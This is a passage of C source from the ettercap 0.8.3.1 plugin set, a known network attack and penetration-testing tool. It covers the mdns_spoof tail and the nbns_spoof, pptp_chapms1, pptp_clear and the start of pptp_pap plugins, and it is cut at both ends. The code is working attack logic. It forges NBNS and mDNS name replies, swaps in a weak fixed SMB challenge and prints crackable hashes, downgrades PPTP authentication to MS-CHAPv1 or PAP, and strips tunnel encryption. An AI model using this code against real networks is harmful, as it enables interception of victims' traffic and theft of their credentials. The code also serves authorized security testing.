strlen(v6tld); /* Check the top level domain of the PTR query - IPv4 */ if (strncmp(arpa + len - v4len, v4tld, v4len) == 0) { /* parses the arpa format */ if (sscanf(arpa, "%d.%d.%d.%d.in-addr.arpa", &oct[3], &oct[2], &oct[1], &oct[0]) != 4) return -E_INVALID; /* collect octets */ ipv4[0] = oct[0] & 0xff; ipv4[1] = oct[1] & 0xff; ipv4[2] = oct[2] & 0xff; ipv4[3] = oct[3] & 0xff; /* init the ip_addr structure */ ip_addr_init(&ptr, AF_INET, ipv4); } /* check the top level domain of the PTR query - IPv6 */ else if (strncmp(arpa + len - v6len, v6tld, v6len) == 0) { /* parses the ip6.arpa format for IPv6 reverse pointer */ if (sscanf(arpa, "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.ip6.arpa", &oct[31], &oct[30], &oct[29], &oct[28], &oct[27], &oct[26], &oct[25], &oct[24], &oct[23], &oct[22], &oct[21], &oct[20], &oct[19], &oct[18], &oct[17], &oct[16], &oct[15], &oct[14], &oct[13], &oct[12], &oct[11], &oct[10], &oct[9], &oct[8], &oct[7], &oct[6], &oct[5], &oct[4], &oct[3], &oct[2], &oct[1], &oct[0]) != 32) { return -E_INVALID; } /* collect octets */ ipv6[0] = (oct[0] << 4) | oct[1]; ipv6[1] = (oct[2] << 4) | oct[3]; ipv6[2] = (oct[4] << 4) | oct[5]; ipv6[3] = (oct[6] << 4) | oct[7]; ipv6[4] = (oct[8] << 4) | oct[9]; ipv6[5] = (oct[10] << 4) | oct[11]; ipv6[6] = (oct[12] << 4) | oct[13]; ipv6[7] = (oct[14] << 4) | oct[15]; ipv6[8] = (oct[16] << 4) | oct[17]; ipv6[9] = (oct[18] << 4) | oct[19]; ipv6[10] = (oct[20] << 4) | oct[21]; ipv6[11] = (oct[22] << 4) | oct[23]; ipv6[12] = (oct[24] << 4) | oct[25]; ipv6[13] = (oct[26] << 4) | oct[27]; ipv6[14] = (oct[28] << 4) | oct[29]; ipv6[15] = (oct[30] << 4) | oct[31]; /* init the ip_addr structure */ ip_addr_init(&ptr, AF_INET6, ipv6); } /* search in the list */ SLIST_FOREACH(d, &mdns_spoof_head, next) { /* * we cannot return whildcards in the reply, * so skip the entry if the name contains a '*' */ if (d->type == ns_t_ptr && !ip_addr_cmp(&ptr, &d->ip)) { /* return the pointer to the name */ *a = d->name; *ip = &d->ip; return E_SUCCESS; } } return -E_NOTFOUND; } static int get_spoofed_srv(const char *name, struct ip_addr **ip, u_int16 *port) { struct mdns_spoof_entry *d; SLIST_FOREACH(d, &mdns_spoof_head, next) { if (d->type == ns_t_srv && match_pattern(name, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *port = d->port; return E_SUCCESS; } } return -E_NOTFOUND; } /* * define sender address and target address */ static int prep_mdns_reply(struct packet_object *po, u_int16 class, struct ip_addr **sender, struct ip_addr **target, u_int8 **tmac , struct ip_addr *reply) { char tmp[MAX_ASCII_ADDR_LEN]; if ((class & MDNS_QU_FLAG) == 0x8000 && ip_addr_is_multicast(&po->L3.dst)) { /* received multicast but unicast response requested */ if (reply != NULL && reply->addr_type == po->L3.src.addr_type) { /* * address family of spoofed address matches address family * of the transport protocol - we use it as the sender */ *sender = reply; *target = &po->L3.src; *tmac = po->L2.src; return E_SUCCESS; } else { /* * we can not use the spoofed address as the sender * a random link-local address need to be generated */ if (ip_addr_random(&po->L3.dst, ntohs(po->L3.src.addr_type)) == E_SUCCESS) { DEBUG_MSG("mdns_spoof: random IP generated: %s\n", ip_addr_ntoa(&po->L3.dst, tmp)); *sender = &po->L3.dst; *target = &po->L3.src; *tmac = po->L2.src; return E_SUCCESS; } else { DEBUG_MSG("mdns_spoof: Random sender IP generation failed\n"); DEBUG_MSG("mdns_spoof: Unknown address family: %s \n", ip_addr_ntoa(&po->L3.src,tmp)); return -E_NOADDRESS; } } } else if (!ip_addr_is_multicast(&po->L3.dst)) { /* MDNS received via unicast - response via unicast */ *sender = &po->L3.dst; *target = &po->L3.src; *tmac = po->L2.src; return E_SUCCESS; } else { /* normal multicast reply */ if (reply != NULL && reply->addr_type == po->L3.dst.addr_type) { /* * send the reply back to the multicast address and set * the spoofed address also as the source ip address */ *sender = reply; *target = &po->L3.dst; *tmac = po->L2.dst; return E_SUCCESS; } else { /* * we can not use the spoofed address as the sender * a random link-local address need to be generated */ if (ip_addr_random(&po->L3.src, ntohs(po->L3.src.addr_type)) == E_SUCCESS) { DEBUG_MSG("mdns_spoof: random IP generated: %s\n", ip_addr_ntoa(&po->L3.src, tmp)); /* * send the reply back to the multicast address and set the * faked address as the source */ *sender = &po->L3.src; *target = &po->L3.dst; *tmac = po->L2.dst; return E_SUCCESS; } else { DEBUG_MSG("mdns_spoof: Random sender IP generation failed\n"); DEBUG_MSG("mdns_spoof: Unknown address family: %s \n", ip_addr_ntoa(&po->L3.src,tmp)); return -E_NOADDRESS; } } } } char *type_str (int type) { return (type == ns_t_a ? "A" : type == ns_t_aaaa ? "AAAA" : type == ns_t_ptr ? "PTR" : type == ns_t_mx ? "MX" : type == ns_t_wins ? "WINS" : type == ns_t_srv ? "SRV" : "?"); } static void mdns_spoof_dump(void) { struct mdns_spoof_entry *d; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("mdns_spoof entries:"); SLIST_FOREACH(d, &mdns_spoof_head, next) { if (ntohs(d->ip.addr_type) == AF_INET) { if (d->type == ns_t_srv) { DEBUG_MSG(" %s -> [%s:%d], type %s, family IPv4", d->name, ip_addr_ntoa(&d->ip, tmp), d->port , type_str(d->type)); } else { DEBUG_MSG(" %s -> [%s], type %s, family IPv4", d->name, ip_addr_ntoa(&d->ip, tmp), type_str(d->type)); } } else if (ntohs(d->ip.addr_type) == AF_INET6) { if (d->type == ns_t_srv) { DEBUG_MSG(" %s -> [%s:%d], type %s, family IPv6", d->name, ip_addr_ntoa(&d->ip, tmp), d->port , type_str(d->type)); } else { DEBUG_MSG(" %s -> [%s], type %s, family IPv6", d->name, ip_addr_ntoa(&d->ip, tmp), type_str(d->type)); } } else { DEBUG_MSG(" %s -> ??", d->name); } } } ettercap-0.8.3.1/plug-ins/nbns_spoof/000775 000000 000000 00000000000 13711276346 017366 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/nbns_spoof/nbns_spoof.c000664 000000 000000 00000027356 13711276346 021715 0ustar00rootroot000000 000000 /* nbns_spoof -- ettercap plugin -- spoofs NBNS replies Copyright (C) Ettercap team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include #include /* required for plugin ops */ #include #include #include #include #include #include #define TYPE_NB 0x0020 #define TYPE_NBSTAT 0x0021 #define CLASS_IN 0x0001 #define NBNS_NAME_LEN 34 #define NBNS_DECODED_NAME_LEN 16 /* From LWIP */ #define OPCODE_R 0x8000 /*OPCODE 1-4 Operation specifier: 0 = query 5 = registration 6 = release 7 = WACK 8 = refresh */ #define OPCODE_MASK 0x7800 #define OPCODE_QUERY 0x0000 #define OPCODE_REGISTRATION 0x2800 #define OPCODE_RELEASE 0x3000 #define OPCODE_WACK 0x3800 #define OPCODE_REFRESH 0x4000 /* NM_FLAGS subfield bits */ #define NM_AA_BIT 0x0400 /* Authoritative Answer */ #define NM_TR_BIT 0x0200 /* TRuncation flag */ #define NM_RD_BIT 0x0100 /* Recursion Desired */ #define NM_RA_BIT 0x0080 /* Recursion Available */ #define NM_B_BIT 0x0010 /* Broadcast flag */ /* Return Codes */ #define RCODE_POS_RSP 0x0000 /* Positive Response */ #define RCODE_FMT_ERR 0x0001 /* Format Error */ #define RCODE_SRV_ERR 0x0002 /* Server failure */ #define RCODE_NAM_ERR 0x0003 /* Name Not Found */ #define RCODE_IMP_ERR 0x0004 /* Unsupported request */ #define RCODE_RFS_ERR 0x0005 /* Refused */ #define RCODE_ACT_ERR 0x0006 /* Active error */ #define RCODE_CFT_ERR 0x0007 /* Name in conflict */ #define RCODE_MASK 0x0007 /* Mask */ struct nbns_header { u_int16 transactid; /* Transaction ID */ #ifdef WORDS_BIGENDIAN u_char response: 1; /* response or query */ u_char opcode: 4; /* opcode */ /* nm_flags */ u_char aa: 1; u_char tc: 1; u_char rd: 1; u_char ra: 1; u_char unused: 2; u_char broadcast: 1; u_char rcode: 4; /* RCODE */ #else u_char rd: 1; u_char tc: 1; u_char aa: 1; u_char opcode: 4; u_char response: 1; u_char rcode: 4; u_char broadcast: 1; u_char unused: 2; u_char ra: 1; #endif u_int16 qd_count; /* QDCOUNT */ u_int16 an_count; /* AN_COUNT */ u_int16 ns_count; /* NS_COUNT */ u_int16 ar_count; /* AR_COUNT */ }; /** NBNS rdata field */ struct nbns_rdata { u_int16 len; u_int16 nbflags; u_int32 addr; }; #define NBNS_MSGLEN_QUERY_RESPONSE 70 #define NBNS_TTL_POS 12+1+NBNS_NAME_LEN+1+2+2 #define NBNS_RDATA_POS NBNS_TTL_POS + 2 #define NBNS_QUERY_POS 12 struct nbns_query { struct nbns_header header; char question[NBNS_NAME_LEN]; u_int16 type; u_int16 class; }; struct nbns_response { struct nbns_header header; char rr_name[NBNS_NAME_LEN]; /* RR_NAME */ u_int16 type; u_int16 class; u_int32 ttl; struct nbns_rdata rr_data; }; struct nbns_spoof_entry { char *name; struct ip_addr ip; /* no ipv6 nbns */ SLIST_ENTRY(nbns_spoof_entry) next; }; static SLIST_HEAD(, nbns_spoof_entry) nbns_spoof_head; /* * SMB portion */ typedef struct { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; } SMB_header; typedef struct { u_char mesg; u_char flags; u_short len; } NetBIOS_header; #define IF_IN_PCK(x,y) if((x) >= y->packet && (x) < (y->packet + y->len) ) /* protos */ int plugin_load(void *); static int nbns_spoof_init(void *); static int nbns_spoof_fini(void *); static int load_db(void); static void nbns_spoof(struct packet_object *po); static void nbns_set_challenge(struct packet_object *po); static void nbns_print_jripper(struct packet_object *po); static int parse_line(const char *str, int line, char **ip_p, char **name_p); static int nbns_expand(char *compressed, char *dst); static int get_spoofed_nbns(const char *a, struct ip_addr **ip); static void nbns_spoof_dump(void); struct plugin_ops nbns_spoof_ops = { /* ettercap version must be the global EC_VERSION */ .ettercap_version = EC_VERSION, .name = "nbns_spoof", .info = "Sends spoof NBNS replies & sends SMB challenges with custom challenge", .version = "1.1", .init = &nbns_spoof_init, .fini = &nbns_spoof_fini, }; int plugin_load(void *handle) { if (load_db() != E_SUCCESS) return -E_INVALID; nbns_spoof_dump(); return plugin_register(handle, &nbns_spoof_ops); } static int nbns_spoof_init(void *dummy) { /* variable not used */ (void) dummy; /* * add the hook in the dissector * this will pass only valid NBNS packets */ hook_add(HOOK_PROTO_NBNS, &nbns_spoof); hook_add(HOOK_PROTO_SMB, &nbns_set_challenge); hook_add(HOOK_PROTO_SMB_CMPLT, &nbns_print_jripper); return PLUGIN_RUNNING; } static int nbns_spoof_fini(void *dummy) { /* variable not used */ (void) dummy; hook_del(HOOK_PROTO_NBNS, &nbns_spoof); return PLUGIN_FINISHED; } /* load database */ static int load_db(void) { struct nbns_spoof_entry *d; FILE *f; char line[128]; char *ptr, *ipstr, *name; int lines = 0; f = open_data("etc", ETTER_NBNS, FOPEN_READ_TEXT); if (f == NULL) { USER_MSG("Cannot open %s\n", ETTER_NBNS); return -E_INVALID; } while (fgets(line, 128, f)) { /* count lines */ lines++; if ((ptr = strchr(line, '#'))) *ptr = '\0'; /* skip empty lines */ if (!*line || *line == '\r' || *line == '\n') continue; /* strip apart the line */ if (!parse_line(line, lines, &ipstr, &name)) continue; /* create the entry */ SAFE_CALLOC(d, 1, sizeof(struct nbns_spoof_entry)); /* convert IP string into ip_addr struct */ if (ip_addr_pton(ipstr, &d->ip) != E_SUCCESS) { USER_MSG("%s:%d Invalid IP address\n", ETTER_NBNS, lines); SAFE_FREE(d); continue; } d->name = strdup(name); /* insert to list */ SLIST_INSERT_HEAD(&nbns_spoof_head, d, next); } fclose(f); return E_SUCCESS; } /* * Parse line on format " ". */ static int parse_line(const char *str, int line, char **ip_p, char **name_p) { static char name[100+1]; static char ip[20+1]; if(sscanf(str, "%100s %20[^\r\n# ]", name, ip) != 2) { USER_MSG("%s:%d Invalid entry %s\n", ETTER_NBNS, line, str); return(0); } if (strchr(ip, ':')) { USER_MSG("%s:%d IP address must be IPv4\n", ETTER_NBNS, line); return(0); } *name_p = name; *ip_p = ip; return (1); } /* * HOOK_POINT SMB * Change the challenge sent by the server to something * simple that can be decoded by other tools */ static void nbns_set_challenge(struct packet_object *po) { u_char *ptr; SMB_header *smb; NetBIOS_header *NetBIOS; ptr = po->DATA.data; u_int64 SMB_WEAK_CHALLENGE = 0x1122334455667788; NetBIOS = (NetBIOS_header *)ptr; smb = (SMB_header *)(NetBIOS + 1); /* move to data */ ptr = (u_char *)(smb + 1); if (memcmp(smb->proto, "\xffSMB", 4) != 0) return; if (smb->cmd == 0x72 && FROM_SERVER("smb", po)) { if (ptr[3] & 2) { /* Check encryption key len */ if (*ptr != 0) { ptr += 3; /* Go to BLOB */ //memcpy new challenge (8 bytes) to ptr memset(ptr, (long)SMB_WEAK_CHALLENGE, 8); po->flags |= PO_MODIFIED; /* calculate checksum */ USER_MSG("nbns_spoof: Modified SMB challenge\n"); } } } } /* * Hook point HOOK_PROTO_SMB_CMPLT * receives a packet_object with the * SMB username, password, challenge, etc. */ static void nbns_print_jripper(struct packet_object *po) { //Domain = po->DISSECTOR.info //User = po->DISSECTOR.user //Pass = po->DISSECTOR.pass /* * Thanks to the SMB dissector, po->DISSECTOR.pass contains everything we need but domain */ USER_MSG("%s%s\n", po->DISSECTOR.info, po->DISSECTOR.pass); } /* * parse the packet and send the fake reply */ static void nbns_spoof(struct packet_object *po) { struct nbns_query *nbns; struct nbns_header *header; char name[NBNS_DECODED_NAME_LEN]; //header = (struct nbns_header *)po->DATA.data; nbns = (struct nbns_query *)po->DATA.data; header = (struct nbns_header *)&nbns->header; if (header->response) { /* We only want queries */ return; } if (ntohs(nbns->class) != CLASS_IN || ntohs(nbns->type) != TYPE_NB) { /* We only handle internet class and NB type */ return; } memset(name, '\0', NBNS_DECODED_NAME_LEN); nbns_expand(nbns->question, name); struct ip_addr *reply; char tmp[MAX_ASCII_ADDR_LEN]; if (get_spoofed_nbns(name, &reply) != E_SUCCESS) return; u_char *response; SAFE_CALLOC(response, NBNS_MSGLEN_QUERY_RESPONSE, sizeof(u_char)); if (po->DATA.len > 70) { SAFE_FREE(response); return; } memset(response, 0, NBNS_MSGLEN_QUERY_RESPONSE); memcpy(response, po->DATA.data, po->DATA.len); struct nbns_header *hdr = (struct nbns_header*)response; hdr->response = 1; hdr->opcode = ntohs((OPCODE_R+OPCODE_QUERY) & OPCODE_MASK); hdr->rcode = ntohs(0); hdr->broadcast = ntohs(0); hdr->an_count = ntohs(1); hdr->qd_count = ntohs(0); hdr->ra = 0; hdr->rd = 0; hdr->tc = 0; hdr->aa = 1; hdr->ns_count = ntohs(0); hdr->ar_count = ntohs(0); hdr->transactid = header->transactid; u_int16 *ttl1 = (u_int16*)(response+NBNS_TTL_POS); u_int16 *ttl2 = (u_int16*)(response+NBNS_TTL_POS+2); *ttl1 = ntohs(0); *ttl2 = ntohs(0); struct nbns_rdata *rdata = (struct nbns_rdata *) (response+NBNS_RDATA_POS); rdata->len = ntohs(2+sizeof(u_int32)); rdata->nbflags = ntohs(0x0000); rdata->addr = *reply->addr32; /* send fake reply */ send_udp(&EC_GBL_IFACE->ip, &po->L3.src, po->L2.src, po->L4.dst, po->L4.src, response, NBNS_MSGLEN_QUERY_RESPONSE); USER_MSG("nbns_spoof: Query [%s] spoofed to [%s]\n", name, ip_addr_ntoa(reply, tmp)); /* Do not forward request */ po->flags |= PO_DROPPED; SAFE_FREE(response); } /* * return the ip address for the name */ static int get_spoofed_nbns(const char *a, struct ip_addr **ip) { struct nbns_spoof_entry *n; SLIST_FOREACH(n, &nbns_spoof_head, next) { if (match_pattern(a, n->name)) { *ip = &n->ip; return E_SUCCESS; } } return -E_NOTFOUND; } static void nbns_spoof_dump(void) { struct nbns_spoof_entry *n; DEBUG_MSG("nbns_spoof entries:"); SLIST_FOREACH(n, &nbns_spoof_head, next) { if(ntohs(n->ip.addr_type) == AF_INET) { DEBUG_MSG(" %s -> [%s]", n->name, int_ntoa(n->ip.addr32)); } } } static int nbns_expand(char *compressed, char *dst) { //format compressed\00 int len = 0; int x=0; char j, k; for(len = 1; x < NBNS_NAME_LEN; len+=2){ j = (compressed[len] & 0x3f)-1; k = (compressed[len+1] & 0x3f)-1; dst[x/2] = (j<<4)+(k); x+=2; } char *s = strstr(dst, " "); if (s) *s = '\0'; return len; } // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/pptp_chapms1/000775 000000 000000 00000000000 13711276346 017617 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/pptp_chapms1/pptp_chapms1.c000664 000000 000000 00000012362 13711276346 022366 0ustar00rootroot000000 000000 /* pptp_chapms1 -- ettercap plugin -- Forces chapms-v1 from champs-v2 request for PPTP (easier to crack) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include struct ppp_lcp_header { u_char code; u_char ident; u_int16 length; }; #define PPP_CONFIGURE_REQUEST 0x01 #define PPP_CONFIGURE_NAK 0x03 #define PPP_CONFIGURE_REJ 0x04 #define PPP_AUTH_REQUEST 0x03 #define PPP_REQUEST_CHAP 0xc223 #define PPP_REQUEST_MSCHAP2 0x81 #define PPP_REQUEST_MSCHAP1 0x80 #define PPP_REQUEST_DUMMY 0xe7 /* protos */ int plugin_load(void *); static int pptp_chapms1_init(void *); static int pptp_chapms1_fini(void *); static void parse_ppp(struct packet_object *po); static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len); /* plugin operations */ struct plugin_ops pptp_chapms1_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "pptp_chapms1", /* a short description of the plugin (max 50 chars) */ .info = "PPTP: Forces chapms-v1 from chapms-v2", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &pptp_chapms1_init, /* deactivation function */ .fini = &pptp_chapms1_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &pptp_chapms1_ops); } /******************* STANDARD FUNCTIONS *******************/ static int pptp_chapms1_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("pptp_chapms1: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("pptp_chapms1: plugin running...\n"); hook_add(HOOK_PACKET_LCP, &parse_ppp); return PLUGIN_RUNNING; } static int pptp_chapms1_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("pptp_chapms1: plugin terminated...\n"); hook_del(HOOK_PACKET_LCP, &parse_ppp); return PLUGIN_FINISHED; } /*********************************************************/ /* Modify ConfigureRequest LCP packets */ static void parse_ppp(struct packet_object *po) { struct ppp_lcp_header *lcp; u_int16 *option; char tmp[MAX_ASCII_ADDR_LEN]; u_char *chcode; /* It is pointless to modify packets that won't be forwarded */ if (!(po->flags & PO_FORWARDABLE)) return; /* PPP decoder placed lcp header in L4 structure. * According to the Hook Point this is an LCP packet. */ lcp = (struct ppp_lcp_header *)po->L4.header; /* Catch only packets that have to be modified */ if ( lcp->code != PPP_CONFIGURE_REQUEST && lcp->code != PPP_CONFIGURE_NAK && lcp->code != PPP_CONFIGURE_REJ) return; if ( (option=(u_int16 *)parse_option( (u_char *)(lcp + 1), PPP_AUTH_REQUEST, ntohs(lcp->length) - sizeof(*lcp))) ==NULL) return; if ( option[1] != htons(PPP_REQUEST_CHAP) ) return; /* Take a look to chap kind of auth */ chcode = (u_char *)option; /* Modify the negotiation */ if (lcp->code == PPP_CONFIGURE_REQUEST && chcode[4] == PPP_REQUEST_MSCHAP2) { chcode[4] = PPP_REQUEST_DUMMY; if (!ip_addr_null(&po->L3.dst) && !ip_addr_null(&po->L3.src)) { USER_MSG("pptp_chapms1: Forced PPP MS-CHAPv1 auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); } } if (lcp->code == PPP_CONFIGURE_NAK && chcode[4] == PPP_REQUEST_MSCHAP2) chcode[4] = PPP_REQUEST_MSCHAP1; if (lcp->code == PPP_CONFIGURE_REJ && chcode[4] == PPP_REQUEST_DUMMY) chcode[4] = PPP_REQUEST_MSCHAP2; } /* Search an option in the packet */ static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len) { /* Avoid never-ending parsing on bogus packets ;) */ char counter=0; while (tot_len>0 && *buffer!=option && counter<20) { tot_len -= buffer[1]; buffer += buffer[1]; counter++; } if (*buffer == option) return buffer; return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/pptp_clear/000775 000000 000000 00000000000 13711276346 017351 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/pptp_clear/pptp_clear.c000664 000000 000000 00000014531 13711276346 021652 0ustar00rootroot000000 000000 /* pptp_clear -- ettercap plugin -- Tries to force PPTP cleartext connections Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include struct ppp_lcp_header { u_char code; u_char ident; u_int16 length; }; #define PPP_CONFIGURE_REQUEST 0x01 #define PPP_CONFIGURE_REJ 0x04 #define PPP_REQUEST_FCOMP 0x07 #define PPP_REQUEST_ACOMP 0x08 #define PPP_REQUEST_VJC 0x02 #define PPP_REQUEST_DUMMY1 0xe7 #define PPP_REQUEST_DUMMY2 0x7e #define PPP_OBFUSCATE 0x30 /* protos */ int plugin_load(void *); static int pptp_clear_init(void *); static int pptp_clear_fini(void *); static void parse_lcp(struct packet_object *po); static void parse_ecp(struct packet_object *po); static void parse_ipcp(struct packet_object *po); static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len); static void obfuscate_options(u_char * buffer, int16 tot_len); /* plugin operations */ struct plugin_ops pptp_clear_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "pptp_clear", /* a short description of the plugin (max 50 chars) */ .info = "PPTP: Tries to force cleartext tunnel", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &pptp_clear_init, /* deactivation function */ .fini = &pptp_clear_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &pptp_clear_ops); } /******************* STANDARD FUNCTIONS *******************/ static int pptp_clear_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("pptp_clear: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("pptp_clear: plugin running...\n"); hook_add(HOOK_PACKET_LCP, &parse_lcp); hook_add(HOOK_PACKET_ECP, &parse_ecp); hook_add(HOOK_PACKET_IPCP, &parse_ipcp); return PLUGIN_RUNNING; } static int pptp_clear_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("pptp_clear: plugin terminated...\n"); hook_del(HOOK_PACKET_LCP, &parse_lcp); hook_del(HOOK_PACKET_ECP, &parse_ecp); hook_del(HOOK_PACKET_IPCP, &parse_ipcp); return PLUGIN_FINISHED; } /*********************************************************/ /* Clear Header Compression */ static void parse_lcp(struct packet_object *po) { struct ppp_lcp_header *lcp; u_char *option; if (!(po->flags & PO_FORWARDABLE)) return; lcp = (struct ppp_lcp_header *)po->L4.header; if ( lcp->code == PPP_CONFIGURE_REQUEST) { if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_FCOMP, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_DUMMY1; if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_ACOMP, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_DUMMY2; } if ( lcp->code == PPP_CONFIGURE_REJ) { if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_DUMMY1, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_FCOMP; if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_DUMMY2, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_ACOMP; } } /* Clear Compression and Encryption */ static void parse_ecp(struct packet_object *po) { struct ppp_lcp_header *lcp; if (!(po->flags & PO_FORWARDABLE)) return; lcp = (struct ppp_lcp_header *)po->L4.header; if (lcp->code == PPP_CONFIGURE_REQUEST || lcp->code == PPP_CONFIGURE_REJ) obfuscate_options((u_char *)(lcp + 1), ntohs(lcp->length)-sizeof(*lcp)); } /* Clear Van Jacobson Compression */ static void parse_ipcp(struct packet_object *po) { struct ppp_lcp_header *lcp; u_char *option; if (!(po->flags & PO_FORWARDABLE)) return; lcp = (struct ppp_lcp_header *)po->L4.header; if ( lcp->code == PPP_CONFIGURE_REQUEST) if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_VJC, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_DUMMY1; if ( lcp->code == PPP_CONFIGURE_REJ) if ( (option = (u_char *)parse_option( (u_char *)(lcp + 1), PPP_REQUEST_DUMMY1, ntohs(lcp->length)-sizeof(*lcp))) !=NULL) option[0] = PPP_REQUEST_VJC; } /* Search an option in the packet */ static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len) { /* Avoid never-ending parsing on bogus packets ;) */ char counter=0; while (tot_len>0 && *buffer!=option && counter<20) { tot_len -= buffer[1]; buffer += buffer[1]; counter++; } if (*buffer == option) return buffer; return NULL; } /* Change the requested options to something unknown * and viceversa */ static void obfuscate_options(u_char * buffer, int16 tot_len) { char counter=0; while (tot_len>0 && counter<20) { if (buffer[0]>0 && buffer[0]!=0xff) buffer[0]^=PPP_OBFUSCATE; tot_len -= buffer[1]; buffer += buffer[1]; counter++; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/pptp_pap/000775 000000 000000 00000000000 13711276346 017043 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/pptp_pap/pptp_pap.c000664 000000 000000 00000012052 13711276346 021032 0ustar00rootroot000000 000000 /* pptp_pap -- ettercap plugin -- Forces PAP during PPTP negotiation (it almost fails) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include struct ppp_lcp_header { u_char code; u_char ident; u_int16 length; }; #define PPP_CONFIGURE_REQUEST 0x01 #define PPP_CONFIGURE_NAK 0x03 #define PPP_CONFIGURE_REJ 0x04 #define PPP_AUTH_REQUEST 0x03 #define PPP_REQUEST_PAP 0xc023 #define PPP_REQUEST_CHAP 0xc223 #define PPP_DUMMY_REQUEST 0xce23 /* protos */ int plugin_load(void *); static int pptp_pap_init(void *); static int pptp_pap_fini(void *); static void parse_ppp(struct packet_object *po); static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len); /* plugin operations */ struct plugin_ops pptp_pap_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "pptp_pap", /* a short description of the plugin (max 50 chars) */ .info = "PPTP: Forces PAP authentication", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &pptp_pap_init, /* deactivation function */ .fini = &pptp_pap_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &pptp_pap_ops); } /******************* STANDARD FUNCTIONS *******************/ static int pptp_pap_init(void *dummy) 